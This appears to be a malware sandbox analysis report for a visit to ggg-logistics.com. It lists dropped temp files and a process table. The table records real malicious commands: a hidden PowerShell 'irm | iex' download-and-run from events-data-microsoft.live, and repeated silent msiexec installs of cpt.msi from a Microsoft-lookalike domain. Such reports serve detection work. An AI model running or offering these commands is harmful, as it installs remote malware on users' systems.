C:\Windows\Temp\~DF53E788A7273818D2.TMP
data
dropped
C:\Windows\Temp\~DF551508CDFEBC81F5.TMP
data
dropped
C:\Windows\Temp\~DF560438F47D16CF7A.TMP
data
dropped
C:\Windows\Temp\~DF56EC9B094A58824C.TMP
data
dropped
C:\Windows\Temp\~DF5733489E05FFA44B.TMP
data
dropped
C:\Windows\Temp\~DF57915A68AEDC5C19.TMP
data
dropped
C:\Windows\Temp\~DF5977941E2670732A.TMP
data
dropped
C:\Windows\Temp\~DF5BEC298C4E79E0A3.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF5FCFA7CFFC214A67.TMP
data
dropped
C:\Windows\Temp\~DF5FF2C1F0D53A9ABC.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF603098CE0AB0A3DF.TMP
data
dropped
C:\Windows\Temp\~DF605677CED842D8AA.TMP
data
dropped
C:\Windows\Temp\~DF605BC1EFCA45DB74.TMP
data
dropped
C:\Windows\Temp\~DF62F77B2A1CAC6569.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF62FC754CCB5DD8DE.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF643A85A5425C7D99.TMP
data
dropped
C:\Windows\Temp\~DF649D3945024CCE15.TMP
data
dropped
C:\Windows\Temp\~DF653732D9C64A3548.TMP
data
dropped
C:\Windows\Temp\~DF67842524022ABADB.TMP
data
dropped
C:\Windows\Temp\~DF6879C5401ED5A400.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF68BEE218FB643E63.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF68D50FBF9887B05B.TMP
data
dropped
C:\Windows\Temp\~DF6919097596D66974.TMP
data
dropped
C:\Windows\Temp\~DF69FF37E413AC799A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF6A184DD7E8DDA85B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF6A6C712F316537AF.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF6F2648E642BC2214.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF6F305F71B521047A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF6FF91F195588E18E.TMP
data
dropped
C:\Windows\Temp\~DF72D37166D3853354.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF7558191626F94644.TMP
data
dropped
C:\Windows\Temp\~DF76C5B523D4D569DD.TMP
data
dropped
C:\Windows\Temp\~DF76E5FA415DEEB11E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF78BD33D63D86F49C.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF79C23190D5785BA3.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF7A50F0BECDA30773.TMP
data
dropped
C:\Windows\Temp\~DF7BC0B9417BE4FDA5.TMP
data
dropped
C:\Windows\Temp\~DF7BCAEFED5076E4E3.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF7CCB8E5AD1D47800.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF7D5774BA7A9861C0.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF7E5FBE18040F9D8F.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF7ECCA10B1098B7B6.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF7FA1019D4E827442.TMP
data
dropped
C:\Windows\Temp\~DF817AFD7D48694130.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF82836FCB2617473A.TMP
data
dropped
C:\Windows\Temp\~DF83B1A34108014824.TMP
data
dropped
C:\Windows\Temp\~DF8436DE29F5AAEA90.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF85A8CC03CE0D7EB4.TMP
data
dropped
C:\Windows\Temp\~DF85F618BB697FAAAA.TMP
data
dropped
C:\Windows\Temp\~DF863F1D80E3D3B1FB.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF86430349EC78E0E3.TMP
data
dropped
C:\Windows\Temp\~DF8969561D836789F1.TMP
data
dropped
C:\Windows\Temp\~DF8B7B0049A3A8FA84.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF8BDBF19E9F732C9E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF8C45143D2995B628.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF8C62626D0159AD8A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF8CF393B3E6C97FF1.TMP
data
dropped
C:\Windows\Temp\~DF8DCD8767E118CCD3.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF8DFAB8E830A0F897.TMP
data
dropped
C:\Windows\Temp\~DF8ED6DE029BE63B04.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF8EEA489C8ADA8D0A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF901A95B420F0F1B1.TMP
data
dropped
C:\Windows\Temp\~DF91E4E7D238D0E111.TMP
data
dropped
C:\Windows\Temp\~DF921B5EDE4170972C.TMP
data
dropped
C:\Windows\Temp\~DF9251D2D8DB42DD69.TMP
data
dropped
C:\Windows\Temp\~DF9300A7D67E5AED12.TMP
data
dropped
C:\Windows\Temp\~DF933E6C7D1787B4BD.TMP
data
dropped
C:\Windows\Temp\~DF93907F5CE73FF310.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF93C50D6CB1054D11.TMP
data
dropped
C:\Windows\Temp\~DF94DFE9B7F2FBBAA8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF94F353C20A732D3B.TMP
data
dropped
C:\Windows\Temp\~DF95EC55E303D4F727.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF9699ACD61C1899A4.TMP
data
dropped
C:\Windows\Temp\~DF9740D472AB55FEAE.TMP
data
dropped
C:\Windows\Temp\~DF98050D17798D5EA1.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF98B81577D92E96D2.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF98BBB0E23AFBBBE8.TMP
data
dropped
C:\Windows\Temp\~DF99733FE3BEA941DB.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF99EB2A25E3B66711.TMP
data
dropped
C:\Windows\Temp\~DF9B15F9565922D72B.TMP
data
dropped
C:\Windows\Temp\~DF9B410D9183F9B34D.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF9BE3D2AF87DE376C.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DF9F2CCE67BAEC6137.TMP
data
dropped
C:\Windows\Temp\~DFA1158571D6F86A79.TMP
data
dropped
C:\Windows\Temp\~DFA34952E61D23431E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFA4E987675FBD7D89.TMP
data
dropped
C:\Windows\Temp\~DFA634BED78A21C58A.TMP
data
dropped
C:\Windows\Temp\~DFA7B344DFB65FE324.TMP
data
dropped
C:\Windows\Temp\~DFA7D7BCF0D88BB204.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFA97A51BE1B3547F3.TMP
data
dropped
C:\Windows\Temp\~DFA9F5A99E5200DEA7.TMP
data
dropped
C:\Windows\Temp\~DFAB4AAD2F61B7BE4C.TMP
data
dropped
C:\Windows\Temp\~DFACAB0678F4E934CC.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFACCFDEF28F53DAAD.TMP
data
dropped
C:\Windows\Temp\~DFAD00A4388854C47C.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFAD48042794E510DB.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFADF82CBC8B792F31.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFAE126B8197DA7DE8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB04D2044383CD930.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB17E76ACC973B979.TMP
data
dropped
C:\Windows\Temp\~DFB198C4925E4A475D.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB22157C51B6EAED8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB2FC59F9CC885F6B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB539775132E3F283.TMP
data
dropped
C:\Windows\Temp\~DFB5A626DDFE8D968B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB5F63791B615B059.TMP
data
dropped
C:\Windows\Temp\~DFB6D4CBCDF8917423.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB7B8B01D96CA06A7.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB7E88B44DBCADE21.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFB97954AFB693B24A.TMP
data
dropped
C:\Windows\Temp\~DFBA32082EDF3507C6.TMP
data
dropped
C:\Windows\Temp\~DFBA7740129B03E0FF.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFBC614DC81DFE4B5E.TMP
data
dropped
C:\Windows\Temp\~DFBD1424DD0C873C40.TMP
data
dropped
C:\Windows\Temp\~DFBD512334FC5817C3.TMP
data
dropped
C:\Windows\Temp\~DFBD53BB9831004DCE.TMP
data
dropped
C:\Windows\Temp\~DFBED3FC6B907E192A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFBF7E18115E23164D.TMP
data
dropped
C:\Windows\Temp\~DFBFCE00C6E5F29180.TMP
data
dropped
C:\Windows\Temp\~DFBFD8D217DECCA73E.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC0B89DB14A6DFF9A.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC0C3723128C981E4.TMP
data
dropped
C:\Windows\Temp\~DFC191FD33958E2A0B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC1DEFFB11CB711CB.TMP
data
dropped
C:\Windows\Temp\~DFC2A6287799E717B9.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC2A64D69CD706B76.TMP
data
dropped
C:\Windows\Temp\~DFC2DF903DA9069084.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC32FD800F3649CF3.TMP
data
dropped
C:\Windows\Temp\~DFC3A899C1BBB87931.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC4233ADB1102091B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC55C3E82A18C9E62.TMP
data
dropped
C:\Windows\Temp\~DFC6626CFE63AEA897.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC7132C7E86ED19FD.TMP
data
dropped
C:\Windows\Temp\~DFC77EF4E7E0379C1F.TMP
data
dropped
C:\Windows\Temp\~DFC7BB0FD8F0CD7E43.TMP
data
dropped
C:\Windows\Temp\~DFC856D07508871413.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFC96705262D01DA98.TMP
data
dropped
C:\Windows\Temp\~DFC9F8CE4141DF466C.TMP
data
dropped
C:\Windows\Temp\~DFCBDF1D6A801BECAE.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFCC97BEC04E1F0EB8.TMP
data
dropped
C:\Windows\Temp\~DFCE2BB5FAB838ECF6.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFCE91DE763555C2FE.TMP
data
dropped
C:\Windows\Temp\~DFCF15A2E99653D915.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFCF1F9EAB0EAD99F6.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFD04866B57BCA1E87.TMP
data
dropped
C:\Windows\Temp\~DFD0E54EE4880EA32C.TMP
data
dropped
C:\Windows\Temp\~DFD1102040383F4A56.TMP
data
dropped
C:\Windows\Temp\~DFD1A514156A3E5933.TMP
data
dropped
C:\Windows\Temp\~DFD2EDF4833EF17346.TMP
data
dropped
C:\Windows\Temp\~DFD7171E4E13AE87E0.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFDA76BD50F0828A68.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFDB2E1F92C41DD8A0.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFDC4FEDC389EAAC5A.TMP
data
dropped
C:\Windows\Temp\~DFDD011EC38A31103F.TMP
data
dropped
C:\Windows\Temp\~DFDDE986A5003B92F2.TMP
data
dropped
C:\Windows\Temp\~DFDE0BFD6B31B99776.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFDE77CB4368609C97.TMP
data
dropped
C:\Windows\Temp\~DFDEA53DC794FFA7E7.TMP
data
dropped
C:\Windows\Temp\~DFDEE7D8CACC0643BC.TMP
data
dropped
C:\Windows\Temp\~DFE0BF00AA1916429D.TMP
data
dropped
C:\Windows\Temp\~DFE120A11B43EDBF44.TMP
data
dropped
C:\Windows\Temp\~DFE1576488A7C5D445.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFE18EFDF62B85CA24.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFE1D0145A824330D2.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFE26248B5BA867331.TMP
data
dropped
C:\Windows\Temp\~DFE3CAB777DD751563.TMP
data
dropped
C:\Windows\Temp\~DFE4AB33C0F7FE7109.TMP
data
dropped
C:\Windows\Temp\~DFE8375D68123673AC.TMP
data
dropped
C:\Windows\Temp\~DFEA76A9170AB59A1F.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFEC1B6BFAF9B05AFC.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFEC26517ACFD26A22.TMP
data
dropped
C:\Windows\Temp\~DFED1B095F70B4AC5B.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFEE0ADA5F293E5402.TMP
data
dropped
C:\Windows\Temp\~DFEFF0034F0B3A0434.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFF1260DE9840B5655.TMP
data
dropped
C:\Windows\Temp\~DFF208C62C5387DB76.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFF251FC2B6DEE53A0.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFF273E5716258B828.TMP
data
dropped
C:\Windows\Temp\~DFF8BB05F2019713AC.TMP
data
dropped
C:\Windows\Temp\~DFF8DAEDE01DA420B8.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFF976EA698D56C0A8.TMP
data
dropped
C:\Windows\Temp\~DFFA1D99BEA85394BF.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFFA4AFDA040189E7C.TMP
data
dropped
C:\Windows\Temp\~DFFA95B097D509C767.TMP
data
dropped
C:\Windows\Temp\~DFFAE1A4125B94D954.TMP
data
dropped
C:\Windows\Temp\~DFFAF9112BC57EC1D6.TMP
data
dropped
C:\Windows\Temp\~DFFD2E52A87618462F.TMP
data
dropped
C:\Windows\Temp\~DFFDDA456FF493925D.TMP
data
dropped
C:\Windows\Temp\~DFFF1610EC4B6FA539.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFFF4EA6CE37375935.TMP
Composite Document File V2 Document, Cannot read section info
dropped
C:\Windows\Temp\~DFFF60F548C5C8AC21.TMP
data
dropped
Chrome Cache Entry: 487
gzip compressed data, max compression, truncated
downloaded
Chrome Cache Entry: 488
Web Open Font Format (Version 2), TrueType, length 48332, version 1.0
downloaded
Chrome Cache Entry: 489
Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
downloaded
Chrome Cache Entry: 490
Web Open Font Format (Version 2), TrueType, length 12372, version 1.0
downloaded
Chrome Cache Entry: 491
gzip compressed data, max compression, original size modulo 2^32 134502
downloaded
Chrome Cache Entry: 492
gzip compressed data, max compression, original size modulo 2^32 9249
downloaded
Chrome Cache Entry: 493
data
downloaded
There are 384 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3264,i,11090072880951647910,17287777256714508569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3492 /prefetch:3
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3264,i,11090072880951647910,17287777256714508569,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=4812 /prefetch:8
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ggg-logistics.com/"
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\System32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EF716064682E1076D0BADB4927A14935
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$s='irm events-data-microsoft.live/h8xiyPNTne';iex ([string]::Join('|', $s, 'iex'))"
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\systeminfo.exe
"C:\Windows\system32\systeminfo.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\msiexec.exe
msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /K msiexec /q /i https://dnsg-microsoftds-data.com/sign/cpt.msi
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
